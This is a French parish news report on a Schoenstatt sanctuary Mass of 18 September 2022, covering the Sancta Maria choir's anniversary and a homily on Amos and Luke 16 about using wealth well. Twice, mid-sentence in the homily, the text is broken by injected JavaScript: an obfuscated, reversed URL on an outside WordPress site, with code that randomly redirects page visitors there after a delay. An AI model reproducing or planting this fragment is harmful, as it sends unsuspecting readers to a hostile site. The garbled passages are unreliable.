Ce vingt-cinquième Dimanche du Temps Ordinaire tombe le 18 septembre 2022, une date à laquelle le Sanctuaire célèbre le renouvellement de l’Alliance d’Amour avec la Mère Trois Admirable. En cette date, les membres du Mouvement de Schoenstatt sont généralement plus actifs au même titre que la chorale Sancta Maria qui anime généralement la sainte messe du 18 de chaque mois. Signalons que ladite chorale qui a animé en chants liturgique cette célébration eucharistique présidée par le Père Léonce NTAKIRUTIMANA célébrée son dix-huitième anniversaire d’apostolat au Sanctuaire.

Dans son homélie, précédée par les saintes Lectures tirées du livre du prophète Amos (Am 8, 4-7), de la première lettre de saint Paul apôtre à Timothée (1 Tm 2, 1-8) et de l’Évangile de Jésus Christ selon saint Luc (Lc 16, 1-13), le célébrant a expliqué aux fidèles que le Seigneur veut qu’ils fassent bon usage de leurs richesses pour qu’elles leur servent à se préparer à entrer dans le Royaume des cieux. Nous avons déjà tous remarqué que les gens ne vivent pas longtemps. Des enfants, des jeunes, des vieillards, tout le monde passe et nous n’avons pas la chance de célébrer notre centième anniversaire de naissance, a-t-il poursuivi. D’ailleurs le Psaume 89 en son dixième verset nous l’explique bien : “ Le nombre de nos années ? soixante-dix, quatre-vingts pour les plus vigoureux ! Leur plus grand nombre n’est que peine et misère ; elles s’enfuient, nous nous envolons. „ 

Et d’ajouter que Dieu nous aime tous sans tenir compte de notre condition. L’apôtre saint Jean nous le dit en ces termes : « Bien-aimés, dès maintenant, nous sommes enfants de Dieu, mais ce que nous serons n’a pas encore été manifesté. Nous le savons : quand cela sera manifesté, nous lui serons semblables car nous le verrons tel qu’il est. » Quand Dieu envoie un prophète à son peuple, c’est une occasion qu’Il toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne afin que tout le monde se repente et revienne dans la bonne voie. Nous avons entendu dans la première lecture tirée du livre du prophète Amos que sous le règne du roi Jéroboam II Israël était en paix et pendant longtemps. Dans cette période de paix, le peuple s’est enrichi mais seulement une partie de la population. Les nantis traitaient durement les pauvres, les payaient aux services rendus peu ou pas du tout. Suite à ce comportement, le Seigneur envoya Amos, un gardien des troupeaux, vers la Samarie du Nord pour rappeler aux gens de revenir dans la bonne direction. Le prophète ne macha pas les mots : « Non, jamais je n’oublierai aucun de leurs méfaits. »  

 A tout le monde, cette remarque nous est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnée : « N’usez pas de vos avantages pour vous détourner de la voie de Dieu, mais faites tout dans le strict respect de la loi divine pour que ces richesses nous aident à nous approcher de Dieu. Que nous ayons tous le cœur ouvert à partager avec tout le monde ce que nous avons. Ceci nous aidera à faire grandir en nous l’amour et le partage avec notre prochain, a-t-il conclu.

Au moment de l’offertoire, les membres de la chorale Sancta Maria ont présenté à l’Autel leurs offrandes en nature. Et à la fin de la sainte messe, ils ont fait procession vers le Sanctuaire pour y recevoir leur bénédiction.

Nyandwi M.